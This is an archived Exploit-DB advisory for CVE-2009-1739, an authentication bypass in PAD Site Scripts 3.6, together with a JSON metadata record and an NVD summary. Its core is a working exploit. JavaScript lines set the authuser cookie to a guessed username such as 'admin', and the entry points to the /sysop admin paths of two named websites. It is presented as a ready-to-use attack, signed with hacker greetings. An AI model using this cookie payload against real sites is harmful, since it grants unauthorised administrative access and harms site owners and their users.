PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability
2009-05-19T00:00:00
ID EDB-ID:8735 Type exploitdb Reporter Mr.tro0oqy Modified 2009-05-19T00:00:00
Description
PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability. CVE-2009-1739. Webapps exploit for php platform
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
javascript:document.cookie="authuser=[demo];path=/";
[demo]= Guess the username to the login
demo:
-----
Username for this site 'demo'
javascript:document.cookie="authuser=demo;path=/";
http://demo.pad-site-scripts.com/sysop
demo2:
------
Username for this site 'admin'
javascript:document.cookie="authuser=admin;path=/";
http://www.unlimitedpcdownloads.com/sysop/
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE
Syriahacker.net [ArAb Acadmy Security]
all my Friends
# milw0rm.com [2009-05-19]
{"hash": "0b2d8806a6c1862560482f02122bba20453ca8c7ecbb59eee72d48a524d7aade", "id": "EDB-ID:8735", "lastseen": "2016-02-01T08:02:17", "enchantments": {"vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/8735/", "description": "PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability. CVE-2009-1739. Webapps exploit for php platform", "title": "PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability", "sourceData": "=======================================================\n+++++++++++++++++++ information +++++++++++++++++++++++\n=======================================================\n[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability\n\n[+] Found by : Mr.tro0oqy \n \n[+] C0ntact : t.4@windowslive.com <Yemeni ana>\n=======================================================\n+++++++++++++++++++++++ Exploit +++++++++++++++++++++++\n=======================================================\nexploit:\n--------\njavascript:document.cookie=\"authuser=[demo];path=/\";\n\n[demo]= Guess the username to the login\n\ndemo:\n-----\nUsername for this site 'demo'\n\njavascript:document.cookie=\"authuser=demo;path=/\";\n\nhttp://demo.pad-site-scripts.com/sysop\n\ndemo2:\n------\nUsername for this site 'admin'\n\njavascript:document.cookie=\"authuser=admin;path=/\";\n\nhttp://www.unlimitedpcdownloads.com/sysop/\n\n\n=======================================================\n++++++++++++++++++++++ Greetz +++++++++++++++++++++++++\n=======================================================\nThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L\nCyb3r-DeViL- OXIDE\n\nSyriahacker.net [ArAb Acadmy Security] \n\nall my Friends\n\n# milw0rm.com [2009-05-19]\n", "objectVersion": "1.0", "cvelist": ["CVE-2009-1739"], "viewCount": 1, "published": "2009-05-19T00:00:00", "osvdbidlist": ["54593"], "references": [], "reporter": "Mr.tro0oqy", "modified": "2009-05-19T00:00:00", "href": "https://www.exploit-db.com/exploits/8735/"}
{"result": {"cve": [{"id": "CVE-2009-1739", "type": "cve", "title": "CVE-2009-1739", "description": "PAD Site Scripts 3.6 allows remote attackers to bypass authentication and gain privileges as other users, including administrative privileges, by setting the authuser cookie parameter to a valid username.", "published": "2009-05-20T15:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1739", "cvelist": ["CVE-2009-1739"], "lastseen": "2017-09-29T14:26:37"}]}}
